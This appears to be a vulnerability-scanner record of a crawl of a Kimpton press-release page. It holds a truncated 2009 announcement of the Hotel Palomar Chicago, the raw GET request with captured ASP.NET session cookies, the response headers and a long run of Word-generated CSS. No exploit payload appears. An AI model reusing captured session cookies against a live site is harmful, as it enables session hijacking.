li.MsoNormal, div.MsoNormal {mso-style-parent:""; margin:0in; margin-bottom:.0001pt; mso-pagination:widow-orphan; font-size:12.0pt; font-family:"Times New Roman"; mso-fareast-font-family:"Times New Roman"; mso-bidi-font-family:"Times New Roman";}p.MsoCommentText, li.MsoCommentText, div.MsoCommentText {mso-style-noshow:yes; margin:0in; margin-bottom:.0001pt; mso-pagination:widow-orphan; font-size:10.0pt; font-family:"Times New Roman"; mso-fareast-font-family:"Times New Roman"; mso-bidi-font-family:"Times New Roman";}p.MsoHeader, li.MsoHeader, div.MsoHeader {margin:0in; margin-bottom:.0001pt; mso-pagination:widow-orphan; tab-stops:center 3.0in right 6.0in; font-size:12.0pt; font-family:"Times New Roman"; mso-fareast-font-family:"Times New Roman"; mso-bidi-font-family:"Times New Roman";}p.MsoFooter, li.MsoFooter, div.MsoFooter {margin:0in; margin-bottom:.0001pt; mso-pagination:widow-orphan; tab-stops:center 3.0in right 6.0in; font-size:12.0pt; font-family:"Times New Roman"; mso-fareast-font-family:"Times New Roman"; mso-bidi-font-family:"Times New Roman";}span.MsoCommentReference {mso-style-noshow:yes; mso-ansi-font-size:8.0pt; mso-bidi-font-size:8.0pt;}a:link, span.MsoHyperlink {font-family:"Times New Roman"; mso-bidi-font-family:"Times New Roman"; color:blue; text-decoration:underline; text-underline:single;}a:visited, span.MsoHyperlinkFollowed {color:purple; text-decoration:underline; text-underline:single;}strong {mso-bidi-font-weight:bold;}p.MsoCommentSubject, li.MsoCommentSubject, div.MsoCommentSubject {mso-style-noshow:yes; mso-style-parent:"Comment Text"; mso-style-next:"Comment Text"; margin:0in; margin-bottom:.0001pt; mso-pagination:widow-orphan; font-size:10.0pt; font-family:"Times New Roman"; mso-fareast-font-family:"Times New Roman"; mso-bidi-font-family:"Times New Roman"; font-weight:bold;}p.MsoAcetate, li.MsoAcetate, div.MsoAcetate {mso-style-noshow:yes; margin:0in; margin-bottom:.0001pt; mso-pagination:widow-orphan; font-size:8.0pt; font-family:Tahoma; mso-fareast-font-family:"Times New Roman"; mso-bidi-font-family:Tahoma;}span.QC {mso-style-name:QC; mso-style-noshow:yes; mso-ansi-font-size:10.0pt; mso-bidi-font-size:10.0pt; font-family:Arial; mso-ascii-font-family:Arial; mso-hansi-font-family:Arial; mso-bidi-font-family:Arial; color:navy;} /* Page Definitions */@page {mso-footnote-separator:url(":images:header.htm") fs; mso-footnote-continuation-separator:url(":images:header.htm") fcs; mso-endnote-separator:url(":images:header.htm") es; mso-endnote-continuation-separator:url(":images:header.htm") ecs;}@page Section1 {size:8.5in 11.0in; margin:1.0in 1.0in 1.0in 1.0in; mso-header-margin:.5in; mso-footer-margin:.5in; mso-footer:url(":images:header.htm") f1; mso-paper-source:0;}div.Section1 {page:Section1;} /* List Definitions */@list l0 {mso-list-id:83496818; mso-list-type:hybrid; mso-list-template-ids:-1664608870 66569 197641 328713 66569 197641 328713 66569 197641 328713;}@list l0:level1 {mso-level-number-format:bullet; mso-level-text:\F0B7; mso-level-tab-stop:.5in; mso-level-number-position:left; text-indent:-.25in; font-family:Symbol;}@list l1 {mso-list-id:114837897; mso-list-type:hybrid; mso-list-template-ids:-1807987590 66569 197641 328713 66569 197641 328713 66569 197641 328713;}@list l1:level1 {mso-level-number-format:bullet; mso-level-text:\F0B7; mso-level-tab-stop:.5in; mso-level-number-position:left; text-indent:-.25in; font-family:Symbol;}@list l1:level2 {mso-level-number-format:bullet; mso-level-text:o; mso-level-tab-stop:1.0in; mso-level-number-position:left; text-indent:-.25in; font-family:"Courier New"; mso-bidi-font-family:Arial;}@list l2 {mso-list-id:174004372; mso-list-type:hybrid; mso-list-template-ids:682938596 -134842562 197641 328713 66569 197641 328713 66569 197641 328713;}@list l2:level1 {mso-level-number-format:bullet; mso-level-text:\F0B7; mso-level-tab-stop:.5in; mso-level-number-position:left; text-indent:-.25in; font-family:Symbol; color:windowtext;}@list l3 {mso-list-id:501547045; mso-list-type:hybrid; mso-list-template-ids:-1916140730 66569 197641 328713 66569 197641 328713 66569 197641 328713;}@list l3:level1 {mso-level-number-format:bullet; mso-level-text:\F0B7; mso-level-tab-stop:.5in; mso-level-number-position:left; text-indent:-.25in; font-family:Symbol;}@list l4 {mso-list-id:1025711067; mso-list-type:hybrid; mso-list-template-ids:-1054056796 66569 197641 328713 66569 197641 328713 66569 197641 328713;}@list l4:level1 {mso-level-number-format:bullet; mso-level-text:\F0B7; mso-level-tab-stop:.5in; mso-level-number-position:left; text-indent:-.25in; font-family:Symbol;}@list l5 {mso-list-id:1092357548; mso-list-type:hybrid; mso-list-template-ids:1250087272 66569 197641 328713 66569 197641 328713 66569 197641 328713;}@list l5:level1 {mso-level-number-format:bullet; mso-level-text:\F0B7; mso-level-tab-stop:.5in; mso-level-number-position:left; text-indent:-.25in; font-family:Symbol;}@list l5:level2 {mso-level-number-format:bullet; mso-level-text:o; mso-level-tab-stop:1.0in; mso-level-number-position:left; text-indent:-.25in; font-family:"Courier New"; mso-bidi-font-family:Arial;}ol {margin-bottom:0in;}ul {margin-bottom:0in;}--></style><!--[if gte mso 10]><style> /* Style Definitions */table.MsoNormalTable {mso-style-name:"Table Normal"; mso-tstyle-rowband-size:0; mso-tstyle-colband-size:0; mso-style-noshow:yes; mso-style-parent:""; mso-padding-alt:0in 5.4pt 0in 5.4pt; mso-para-margin:0in; mso-para-margin-bottom:.0001pt; mso-pagination:widow-orphan; font-size:10.0pt; font-family:"Times New Roman";}</style><![endif]--><!--[if gte mso 9]><xml> <o:shapedefaults v:ext="edit" spidmax="2050"/></xml><![endif]--><!--[if gte mso 9]><xml> <o:shapelayout v:ext="edit"> <o:idmap v:ext="edit" data="1"/> </o:shapelayout></xml><![endif]--></head><body lang=EN-US link=blue vlink=purple style='tab-interval:.5in'><div class=Section1><p class=MsoNormal align=center style='text-align:center'><!--[if gte vml 1]><v:shapetype id="_x0000_t75" coordsize="21600,21600" o:spt="75" o:preferrelative="t" path="m@4@5l@4@11@9@11@9@5xe" filled="f" stroked="f"> <v:stroke joinstyle="miter"/> <v:formulas> <v:f eqn="if lineDrawn pixelLineWidth 0"/> <v:f eqn="sum @0 1 0"/> <v:f eqn="sum 0 0 @1"/> <v:f eqn="prod @2 1 2"/> <v:f eqn="prod @3 21600 pixelWidth"/> <v:f eqn="prod @3 21600 pixelHeight"/> <v:f eqn="sum @0 0 1"/> <v:f eqn="prod @6 1 2"/> <v:f eqn="prod @7 21600 pixelWidth"/> <v:f eqn="sum @8 21600 0"/> <v:f eqn="prod @7 21600 pixelHeight"/> <v:f eqn="sum @10 21600 0"/> </v:formulas> <v:path o:extrusionok="f" gradientshapeok="t" o:connecttype="rect"/> <o:lock v:ext="edit" aspectratio="t"/></v:shapetype><v:shape id="_x0000_s1027" type="#_x0000_t75" style='position:absolute; left:0;text-align:left;margin-left:162pt;margin-top:-36pt;width:147pt; height:66pt;z-index:-251658752' wrapcoords="-110 0 -110 21355 21600 21355 21600 0 -110 0"> <v:imagedata src="images/image001.jpg" o:title="Palomar Chicago Hotel Glow 1c Invert"/> <w:wrap type="tight"/></v:shape><![endif]--><![if !vml]><img width=149 height=68src="images/image002.gif" align=right hspace=9 v:shapes="_x0000_s1027"><![endif]></p><p class=MsoNormal><i style='mso-bidi-font-style:normal'><spanstyle='font-size:10.0pt;font-family:Arial;mso-bidi-font-family:Arial'><o:p>&nbsp;</o:p></span></i></p><p class=MsoNormal><i style='mso-bidi-font-style:normal'><spanstyle='font-size:10.0pt;font-family:Arial;mso-bidi-font-family:Arial'>MediaContacts:<o:p></o:p></span></i></p><p class=MsoNormal><b style='mso-bidi-font-weight:normal'><i style='mso-bidi-font-style:normal'><span style='font-size:10.0pt;font-family:Arial;mso-bidi-font-family:Arial'>Quinn &amp; Co. <o:p></o:p></span></i></b></p><p class=MsoNormal><i style='mso-bidi-font-style:normal'><spanstyle='font-size:10.0pt;font-family:Arial;mso-bidi-font-family:Arial'>NicoleRuggiero / 212-868-1900 x248 / </span></i><span style='font-size:10.0pt'><ahref="mailto:nruggiero@quinnandco.com"><i style='mso-bidi-font-style:normal'><spanstyle='font-family:Arial;mso-bidi-font-family:Arial'>nruggiero@quinnandco.com</span></i></a></span><istyle='mso-bidi-font-style:normal'><span style='font-size:10.0pt;font-family:Arial;mso-bidi-font-family:Arial'><o:p></o:p></span></i></p><p class=MsoNormal><i style='mso-bidi-font-style:normal'><span lang=DEstyle='font-size:10.0pt;font-family:Arial;mso-bidi-font-family:Arial;mso-ansi-language:DE'>Leslie Dewees / 212-868-1900 x357/ </span></i><spanlang=DE style='font-size:10.0pt;font-family:Arial;mso-bidi-font-family:Arial;mso-ansi-language:DE;mso-ansi-font-style:italic'><ahref="mailto:ldewees@quinnandco.com"><i style='mso-bidi-font-style:normal'><spanstyle='mso-bidi-font-family:Arial'>ldewees@quinnandco.com</span></i></a><istyle='mso-bidi-font-style:normal'> <span style="mso-spacerun:yes">&nbsp;</span><o:p></o:p></i></span></p><p class=MsoNormal><b style='mso-bidi-font-weight:normal'><i style='mso-bidi-font-style:normal'><span style='font-size:10.0pt;font-family:Arial;mso-bidi-font-family:Arial'>Chicago Kimpton Hotels<o:p></o:p></span></i></b></p><p class=MsoNormal><i style='mso-bidi-font-style:normal'><span lang=FRstyle='font-size:10.0pt;font-family:Arial;mso-bidi-font-family:Arial;mso-ansi-language:FR'>Jennifer Navarro /312-325-7188 </span></i><span lang=FRstyle='font-size:10.0pt;font-family:Arial;mso-bidi-font-family:Arial;mso-ansi-language:FR;mso-ansi-font-style:italic'><ahref="file://localhost/jennifer.navarro@kimptonhotels.com"><i style='mso-bidi-font-style:normal'><span style='mso-bidi-font-family:Arial'>/jennifer.navarro@kimptonhotels.com</span></i></a><istyle='mso-bidi-font-style:normal'> <o:p></o:p></i></span></p><p class=MsoNormal><i style='mso-bidi-font-style:normal'><span lang=FRstyle='font-size:10.0pt;font-family:Arial;mso-bidi-font-family:Arial;mso-ansi-language:FR'><o:p>&nbsp;</o:p></span></i></p><p class=MsoNormal><span lang=FR style='font-size:10.0pt;font-family:Arial;mso-bidi-font-family:Arial;mso-ansi-language:FR'><o:p>&nbsp;</o:p></span></p><p class=MsoNormal align=center style='text-align:center'><b style='mso-bidi-font-weight:normal'><span style='font-family:Arial;mso-bidi-font-family:Arial'>RESERVATIONSNOW ACCEPTED FOR <o:p></o:p></span></b></p><p class=MsoNormal align=center style='text-align:center'><b style='mso-bidi-font-weight:normal'><span style='font-family:Arial;mso-bidi-font-family:Arial'>KIMPTON�SNEW HOTEL PALOMAR CHICAGO </span></b><i style='mso-bidi-font-style:normal'><spanstyle='font-family:Arial;mso-bidi-font-family:Arial'><o:p></o:p></span></i></p><p class=MsoNormal align=center style='text-align:center'><i style='mso-bidi-font-style:normal'><span style='font-family:Arial;mso-bidi-font-family:Arial'><o:p>&nbsp;</o:p></span></i></p><p class=MsoNormal align=center style='text-align:center'><i style='mso-bidi-font-style:normal'><span style='font-family:Arial;mso-bidi-font-family:Arial'>EvolvedBoutique Concept in River North Community Features Art Theme, <o:p></o:p></span></i></p><p class=MsoNormal align=center style='text-align:center'><i style='mso-bidi-font-style:normal'><span style='font-family:Arial;mso-bidi-font-family:Arial'>RooftopIndoor Pool and Heartfelt Customer Care<o:p></o:p></span></i></p><p class=MsoNormal style='text-align:justify;line-height:150%;mso-layout-grid-align:none;text-autospace:none'><b style='mso-bidi-font-weight:normal'><spanstyle='font-size:11.0pt;line-height:150%;font-family:Arial;mso-bidi-font-family:Arial'><o:p>&nbsp;</o:p></span></b></p><p class=MsoNormal style='text-align:justify;line-height:150%'><bstyle='mso-bidi-font-weight:normal'><span style='font-size:11.0pt;line-height:150%;font-family:Arial;mso-bidi-font-family:Arial'>CHICAGO &#8211; Nov. 16, 2009</span></b><spanstyle='font-size:11.0pt;line-height:150%;font-family:Arial;mso-bidi-font-family:Arial'> <b style='mso-bidi-font-weight:normal'>&#8211;</b> Reservations are nowbeing accepted for May 1, 2010 arrivals at Kimpton�s new Hotel Palomar Chicago,which will open this spring in the vibrant River North neighborhood as anart-centric addition to the company�s Windy City collection.<spanstyle="mso-spacerun: yes">&nbsp; </span>Special pre-opening group ratesstarting at $99, and pre-opening leisure packages starting at $89, can bebooked online at <a href="http://www.hotelpalomar-chicago.com/"><spanstyle='mso-bidi-font-family:Arial'>www.hotelpalomar-chicago.com</span></a>. <o:p></o:p></span></p><p class=MsoNormal style='text-align:justify;line-height:150%;mso-layout-grid-align:none;text-autospace:none'><span style='font-size:11.0pt;line-height:150%;font-family:Arial;mso-bidi-font-family:Arial'><o:p>&nbsp;</o:p></span></p><p class=MsoNormal style='text-align:justify;line-height:150%;mso-layout-grid-align:none;text-autospace:none'><span style='font-size:11.0pt;line-height:150%;font-family:Arial;mso-bidi-font-family:Arial'>The 261-room art-themed hotelmarks an evolution in the city�s boutique scene with show-stopping design andd�cor by Orlando Diaz-Azcuy, an indoor rooftop pool, brilliantly positioned tooffer expansive views of the city�s southeast landscape, and a green roof.<spanstyle="mso-spacerun: yes">&nbsp; </span>With the new hotel also comes theKimpton promise of a <span style='color:black'>genuine and personalizedapproach to making guests feel comfortable and cared for. </span>�The HotelPalomar will introduce an original perspective on Chicago hospitality,� saidNabil Moubayed, general manager.<span style="mso-spacerun: yes">&nbsp;</span>�The hotel conveys an inviting presence, with a sophisticated yetimaginative experience, that aims to invigorate everyone who..
- /pdfs/press/html/HRC-1109/index.html

/pdfs/press/html/HRC-1109/index.html

http://www.kimptonhotels.com/pdfs/press/html/HRC-1109/index.html

Request

GET /pdfs/press/html/HRC-1109/index.html HTTP/1.1
Referer: http://www.kimptonhotels.com/about-us/press-releases.aspx
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; CloudScan Vulnerability Crawler http://cloudscan.me)
Cache-Control: no-cache
Host: www.kimptonhotels.com
Cookie: ASP.NET_SessionId=hyd2ui55rxmm2q55xslvrq55; ASPSESSIONIDAQQBQDDR=JDFEFPHBNDJFCIHIDDMHMENO
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Wed, 06 Oct 2010 02:10:53 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 36781
Content-Type: text/html
Cache-control: private


<html xmlns:v="urn:schemas-microsoft-com:vml"
xmlns:o="urn:schemas-microsoft-com:office:office"
xmlns:w="urn:schemas-microsoft-com:office:word"
xmlns:m="http://schemas.microsoft.com/office/2004/12/omml"
xmlns:css="http://macVmlSchemaUri" xmlns="http://www.w3.org/TR/REC-html40">

<head>
<meta name=Title content=" ">
<meta name=Keywords content="">
<meta http-equiv=Content-Type content="text/html; charset=windows-1252">
<meta name=ProgId content=Word.Document>
<meta name=Generator content="Microsoft Word 2008">
<meta name=Originator content="Microsoft Word 2008">
<link rel=File-List href="images/filelist.xml">
<link rel=Edit-Time-Data href="images/editdata.mso">
<!--[if !mso]>
<style>
v\:* {behavior:url(#default#VML);}
o\:* {behavior:url(#default#VML);}
w\:* {behavior:url(#default#VML);}
.shape {behavior:url(#default#VML);}
</style>
<![endif]-->
<title> </title>
<!--[if gte mso 9]><xml>
<o:DocumentProperties>
<o:Author> </o:Author>
<o:Template>Normal.dotm</o:Template>
<o:LastAuthor>Marie Chen</o:LastAuthor>
<o:Revision>2</o:Revision>
<o:TotalTime>4</o:TotalTime>
<o:LastPrinted>2009-11-18T19:40:00Z</o:LastPrinted>
<o:Created>2010-01-04T21:51:00Z</o:Created>
<o:LastSaved>2010-01-04T21:51:00Z</o:LastSaved>
<o:Pages>1</o:Pages>
<o:Words>703</o:Words>
<o:Characters>4008</o:Characters>
<o:Lines>33</o:Lines>
<o:Paragraphs>8</o:Paragraphs>
<o:CharactersWithSpaces>4922</o:CharactersWithSpaces>
<o:Version>12.0</o:Version>
</o:DocumentProperties>
<o:OfficeDocumentSettings>
<o:PixelsPerInch>96</o:PixelsPerInch>
<o:TargetScreenSize>800x600</o:TargetScreenSize>
</o:OfficeDocumentSettings>
</xml><![endif]--><!--[if gte mso 9]><xml>
<w:WordDocument>
<w:TrackMoves>false</w:TrackMoves>
<w:TrackFormatting/>
<w:PunctuationKerning/>
<w:ValidateAgainstSchemas/>
<w:SaveIfXMLInvalid>false</w:SaveIfXMLInvalid>
<w:IgnoreMixedContent>false</w:IgnoreMixedContent>
<w:AlwaysShowPlaceholderText>false</w:AlwaysShowPlaceholderText>
<w:Compatibility>
<w:UseNormalStyleForList/>
<w:DontUseIndentAsNumberingTabStop/>
<w:FELineBreak11/>
<w:WW11IndentRules/>
<w:DontAutofitConstrainedTables/>
<w:AutofitLikeWW11/>
<w:HangulWidthLikeWW11/>
</w:Compatibility>
</w:WordDocument>
</xml><![endif]--><!--[if gte mso 9]><xml>
<w:LatentStyles DefLockedState="false" LatentStyleCount="276">
</w:LatentStyles>
</xml><![endif]-->
<style>
<!--
/* Font Definitions */
@font-face
{font-family:Arial;
panose-1:2 11 6 4 2 2 2 2 2 4;
mso-font-charset:0;
mso-generic-font-family:auto;
mso-font-pitch:variable;
mso-font-signature:3 0 0 0 16777216 0;}
@font-face
{font-family:"Courier New";
panose-1:2 7 3 9 2 2 5 2 4 4;
mso-font-charset:0;
mso-generic-font-family:auto;
mso-font-pitch:variable;
mso-font-signature:3 0 0 0 16777216 0;}
@font-face
{font-family:Times;
panose-1:2 0 5 0 0 0 0 0 0 0;
mso-font-charset:0;
mso-generic-font-family:auto;
mso-font-pitch:variable;
mso-font-signature:3 0 0 0 16777216 0;}
@font-face
{font-family:Wingdings;
panose-1:5 2 1 2 1 8 4 8 7 8;
mso-font-charset:2;
mso-generic-font-family:auto;
mso-font-pitch:variable;
mso-font-signature:0 0 65536 0 128 0;}
@font-face
{font-family:Verdana;
panose-1:2 11 6 4 3 5 4 4 2 4;
mso-font-charset:0;
mso-generic-font-family:auto;
mso-font-pitch:variable;
mso-font-signature:3 0 0 0 16777216 0;}
@font-face
{font-family:Calibri;
panose-1:2 15 5 2 2 2 4 3 2 4;
mso-font-charset:0;
mso-generic-font-family:auto;
mso-font-pitch:variable;
mso-font-signature:3 0 0 0 16777216 0;}
@font-face
{font-family:Tahoma;
panose-1:2 11 6 4 3 5 4 4 2 4;
mso-font-charset:0;
mso-generic-font-family:auto;
mso-font-pitch:variable;
mso-font-signature:3 0 0 0 16777216 0;}
@font-face
{font-family:"Arial Unicode MS";
mso-font-charset:128;
mso-generic-font-family:swiss;
mso-font-pitch:variable;
mso-font-signature:-1 -23 1056964608 0 -16695552 0;}
@font-face
{font-family:Consolas;
panose-1:2 11 6 9 2 2 4 3 2 4;
mso-font-charset:0;
mso-generic-font-family:auto;
mso-font-pitch:variable;
mso-font-signature:3 0 0 0 16777216 0;}
/* Style Definitions */
p.MsoNormal, li.MsoNormal, div.MsoNormal
{mso-style-parent:"";
margin:0in;
margin-bottom:.0001pt;
mso-pagination:widow-orphan;
font-size:12.0pt;
font-family:Times;
mso-fareast-font-family:Calibri;
mso-bidi-font-family:Times;}
h1
{mso-margin-top-alt:auto;
margin-right:0in;
mso-margin-bottom-alt:auto;
margin-left:0in;
mso-pagination:widow-orphan;
mso-outline-level:1;
font-size:24.0pt;
font-family:"Arial Unicode MS";
mso-bidi-font-weight:bold;}
h2
{mso-style-next:Normal;
margin-top:12.0pt;
margin-right:0in;
margin-bottom:3.0pt;
margin-left:0in;
mso-pagination:widow-orphan;
page-break-after:avoid;
mso-outline-level:2;
font-size:14.0pt;
font-family:Arial;
mso-bidi-font-family:Arial;
mso-bidi-font-weight:bold;
font-style:italic;}
p.MsoCommentText, li.MsoCommentText, div.MsoCommentText
{mso-style-noshow:yes;
margin:0in;
margin-bottom:.0001pt;
mso-pagination:widow-orphan;
font-size:10.0pt;
font-family:Times;
mso-fareast-font-family:Calibri;
mso-bidi-font-family:Times;}
p.MsoHeader, li.MsoHeader, div.MsoHeader
{margin:0in;
margin-bottom:.0001pt;
mso-pagination:widow-orphan;
tab-stops:center 3.25in right 6.5in;
font-size:12.0pt;
font-family:Times;
mso-fareast-font-family:Calibri;
mso-bidi-font-family:Times;}
p.MsoFooter, li.MsoFooter, div.MsoFooter
{margin:0in;
margin-bottom:.0001pt;
mso-pagination:widow-orphan;
tab-stops:center 3.25in right 6.5in;
font-size:12.0pt;
font-family:Times;
mso-fareast-font-family:Calibri;
mso-bidi-font-family:Times;}
span.MsoCommentReference
{mso-style-noshow:yes;
mso-ansi-font-size:8.0pt;
mso-bidi-font-size:8.0pt;}
p.MsoBodyText, li.MsoBodyText, div.MsoBodyText
{margin:0in;
margin-bottom:.0001pt;
mso-pagination:widow-orphan;
font-size:11.0pt;
font-family:Arial;
mso-fareast-font-family:Calibri;
mso-bidi-font-family:Arial;
color:black;}
p.MsoBodyText2, li.MsoBodyText2, div.MsoBodyText2
{margin-top:0in;
margin-right:0in;
margin-bottom:6.0pt;
margin-left:0in;
line-height:200%;
mso-pagination:widow-orphan;
font-size:12.0pt;
font-family:Times;
mso-fareast-font-family:Calibri;
mso-bidi-font-family:Times;}
p.MsoBodyText3, li.MsoBodyText3, div.MsoBodyText3
{margin-top:0in;
margin-right:0in;
margin-bottom:6.0pt;
margin-left:0in;
mso-pagination:widow-orphan;
font-size:8.0pt;
font-family:Times;
mso-fareast-font-family:Calibri;
mso-bidi-font-family:Times;}
a:link, span.MsoHyperlink
{color:blue;
text-decoration:underline;
text-underline:single;}
a:visited, span.MsoHyperlinkFollowed
{color:purple;
text-decoration:underline;
text-underline:single;}
strong
{mso-bidi-font-weight:bold;}
em
{mso-bidi-font-style:italic;}
p.MsoPlainText, li.MsoPlainText, div.MsoPlainText
{margin:0in;
margin-bottom:.0001pt;
mso-pagination:widow-orphan;
font-size:10.5pt;
font-family:"Times New Roman";
mso-ascii-font-family:Consolas;
mso-fareast-font-family:Calibri;
mso-hansi-font-family:Consolas;
mso-bidi-font-family:"Times New Roman";}
p.MsoCommentSubject, li.MsoCommentSubject, div.MsoCommentSubject
{mso-style-noshow:yes;
mso-style-parent:"Comment Text";
mso-style-next:"Comment Text";
margin:0in;
margin-bottom:.0001pt;
mso-pagination:widow-orphan;
font-size:10.0pt;
font-family:Times;
mso-fareast-font-family:Calibri;
mso-bidi-font-family:Times;
font-weight:bold;}
p.MsoAcetate, li.MsoAcetate, div.MsoAcetate
{mso-style-noshow:yes;
margin:0in;
margin-bottom:.0001pt;
mso-pagination:widow-orphan;
font-size:8.0pt;
font-family:Tahoma;
mso-fareast-font-family:Calibri;
mso-bidi-font-family:Tahoma;}
span.CharChar6
{mso-style-name:" Char Char6";
mso-ansi-font-size:24.0pt;
mso-bidi-font-size:24.0pt;
font-family:"Arial Unicode MS";
mso-ascii-font-family:"Arial Unicode MS";
mso-fareast-font-family:"Arial Unicode MS";
mso-hansi-font-family:"Arial Unicode MS";
mso-bidi-font-family:"Arial Unicode MS";
mso-font-kerning:18.0pt;
font-weight:bold;}
span.CharChar5
{mso-style-name:" Char Char5";
mso-style-noshow:yes;
font-family:Arial;
mso-ascii-font-family:Arial;
mso-hansi-font-family:Arial;
mso-bidi-font-family:Arial;
color:black;}
span.CharChar4
{mso-style-name:" Char Char4";
mso-style-noshow:yes;
mso-ansi-font-size:8.0pt;
mso-bidi-font-size:8.0pt;
font-family:Tahoma;
mso-ascii-font-family:Tahoma;
mso-hansi-font-family:Tahoma;
mso-bidi-font-family:Tahoma;}
span.CharChar3
{mso-style-name:" Char Char3";
mso-style-noshow:yes;
mso-ansi-font-size:10.5pt;
mso-bidi-font-size:10.5pt;
font-family:Consolas;
mso-ascii-font-family:Consolas;
mso-hansi-font-family:Consolas;}
span.CharChar2
{mso-style-name:" Char Char2";
mso-ansi-font-size:12.0pt;
mso-bidi-font-size:12.0pt;
font-family:Times;
mso-ascii-font-family:Times;
mso-hansi-font-family:Times;
mso-bidi-font-family:Times;}
span.kim111
{mso-style-name:kim111;}
span.CharChar1
{mso-style-name:" Char Char1";
mso-style-noshow:yes;
mso-ansi-font-size:12.0pt;
mso-bidi-font-size:12.0pt;
font-family:Times;
mso-ascii-font-family:Times;
mso-hansi-font-family:Times;
mso-bidi-font-family:Times;}
span.CharChar
{mso-style-name:" Char Char";
mso-ansi-font-size:12.0pt;
mso-bidi-font-size:12.0pt;
font-family:Times;
mso-ascii-font-family:Times;
mso-hansi-font-family:Times;
mso-bidi-font-family:Times;}
span.dfs111
{mso-style-name:dfs111;
font-family:Verdana;
mso-ascii-font-family:Verdana;
mso-hansi-font-family:Verdana;}
span.emailstyle17
{mso-style-name:emailstyle17;
mso-style-noshow:yes;
mso-ansi-font-size:10.0pt;
mso-bidi-font-size:10.0pt;
font-family:Arial;
mso-ascii-font-family:Arial;
mso-hansi-font-family:Arial;
mso-bidi-font-family:Arial;
color:windowtext;}
span.kim10
{mso-style-name:kim10;}
p.p12, li.p12, div.p12
{mso-style-name:p12;
mso-margin-top-alt:auto;
margin-right:0in;
mso-margin-bottom-alt:auto;
margin-left:0in;
mso-pagination:widow-orphan;
font-size:12.0pt;
font-family:"Times New Roman";
mso-fareast-font-family:"Times New Roman";
mso-bidi-font-family:"Times New Roman";}
span.MarlieseEngel
{mso-style-name:"Marliese Engel";
mso-style-noshow:yes;
mso-ansi-font-size:11.0pt;
mso-bidi-font-size:11.0pt;
font-family:Arial;
mso-ascii-font-family:Arial;
mso-hansi-font-family:Arial;
mso-bidi-font-family:Arial;
color:black;
font-weight:normal;
font-style:normal;
text-decoration:none;
text-underline:none;
text-decoration:none;
text-line-through:none;}
/* Page Definitions */
@page
{mso-footnote-separator:url(":images:header.htm") fs;
mso-footnote-continuation-separator:url(":images:header.htm") fcs;
mso-endnote-separator:url(":images:header.htm") es;
mso-endnote-continuation-separator:url(":images:header.htm") ecs;}
@page Section1
{size:8.5in 11.0in;
margin:1.0in 1.0in 1.0in 1.0in;
mso-header-margin:.5in;
mso-footer-margin:.5in;
mso-paper-source:0;}
div.Section1
{page:Section1;}
/* List Definitions */
@list l0
{mso-list-id:-1802115189;
mso-list-type:hybrid;
mso-list-template-ids:201068776 -1 -1 -1 -1 -1 -1 -1 -1 -1;}
@list l0:level1
{mso-level-suffix:none;
mso-level-text:"";
mso-level-tab-stop:none;
mso-level-number-position:left;
margin-left:0in;
text-indent:0in;}
@list l0:level2
{mso-level-start-at:0;
mso-level-text:"";
mso-level-tab-stop:none;
mso-level-number-position:left;
margin-left:0in;
text-indent:0in;}
@list l0:level3
{mso-level-start-at:0;
mso-level-text:"";
mso-level-tab-stop:none;
mso-level-number-position:left;
margin-left:0in;
text-indent:0in;}
@list l0:level4
{mso-level-start-at:0;
mso-level-text:"";
mso-level-tab-stop:none;
mso-level-number-position:left;
margin-left:0in;
text-indent:0in;}
@list l0:level5
{mso-level-start-at:0;
mso-level-text:"";
mso-level-tab-stop:none;
mso-level-number-position:left;
margin-left:0in;
text-indent:0in;}
@list l0:level6
{mso-level-start-at:0;
mso-level-text:"";
mso-level-tab-stop:none;
mso-level-number-position:left;
margin-left:0in;
text-indent:0in;}
@list l0:level7
{mso-level-start-at:0;
mso-level-text:"";
mso-level-tab-stop:none;
mso-level-number-position:left;
margin-left:0in;
text-indent:0in;}
@list l0:level8
{mso-level-start-at:0;
mso-level-text:"";
mso-level-tab-stop:none;
mso-level-number-position:left;
margin-left:0in;
text-indent:0in;}
@list l0:level9
{mso-level-start-at:0;
mso-level-text:"";
mso-level-tab-stop:none;
mso-level-number-position:left;
margin-left:0in;
text-indent:0in;}
@list l1
{mso-list-id:1007153;
mso-list-type:hybrid;
mso-list-template-ids:-1871125328 1670048874 197641 328713 66569 197641 328713 66569 197641 328713;}
@list l1:level1
{mso-level-number-format:bullet;
mso-level-text:\F0B7;
mso-level-tab-stop:.25in;
mso-level-number-position:left;
margin-left:.25in;
text-indent:-.25in;
mso-ansi-font-size:8.0pt;
font-family:Symbol;}
@list l2
{mso-list-id:102651134;
mso-list-type:hybrid;
mso-list-template-ids:-718892134 66569 197641 328713 66569 197641 328713 66569 197641 328713;}
@list l2:level1
{mso-level-number-format:bullet;
mso-level-text:\F0B7;
mso-level-tab-stop:.5in;
mso-level-number-position:left;
text-indent:-.25in;
font-family:Symbol;}
@list l3
{mso-list-id:154613679;
mso-list-type:hybrid;
mso-list-template-ids:-695294530 66569 197641 328713 66569 197641 328713 66569 197641 328713;}
@list l3:level1
{mso-level-number-format:bullet;
mso-level-text:\F0B7;
mso-level-tab-stop:.5in;
mso-level-number-position:left;
text-indent:-.25in;
font-family:Symbol;}
@list l4
{mso-list-id:533346185;
mso-list-type:hybrid;
mso-list-template-ids:-2007724532 984073 1639433 1770505 984073 1639433 1770505 984073 1639433 1770505;}
@list l4:level1
{mso-level-tab-stop:.5in;
mso-level-number-position:left;
text-indent:-.25in;}
@list l5
{mso-list-id:762846213;
mso-list-type:hybrid;
mso-list-template-ids:737695120 66569 197641 328713 66569 197641 328713 66569 197641 328713;}
@list l5:level1
{mso-level-number-format:bullet;
mso-level-text:\F0B7;
mso-level-tab-stop:.5in;
mso-level-number-position:left;
text-indent:-.25in;
font-family:Symbol;}
@list l6
{mso-list-id:973101145;
mso-list-type:hybrid;
mso-list-template-ids:135307080 197641 197641 328713 66569 197641 328713 66569 197641 328713;}
@list l6:level1
{mso-level-number-format:bullet;
mso-level-text:o;
mso-level-tab-stop:.5in;
mso-level-number-position:left;
text-indent:-.25in;
font-family:"Courier New";
mso-bidi-font-family:Symbol;}
@list l7
{mso-list-id:1030841178;
mso-list-type:hybrid;
mso-list-template-ids:1856390760 -1888849478 197641 328713 66569 197641 328713 66569 197641 328713;}
@list l7:level1
{mso-level-number-format:bullet;
mso-level-text:-;
mso-level-tab-stop:.5in;
mso-level-number-position:left;
text-indent:-.25in;
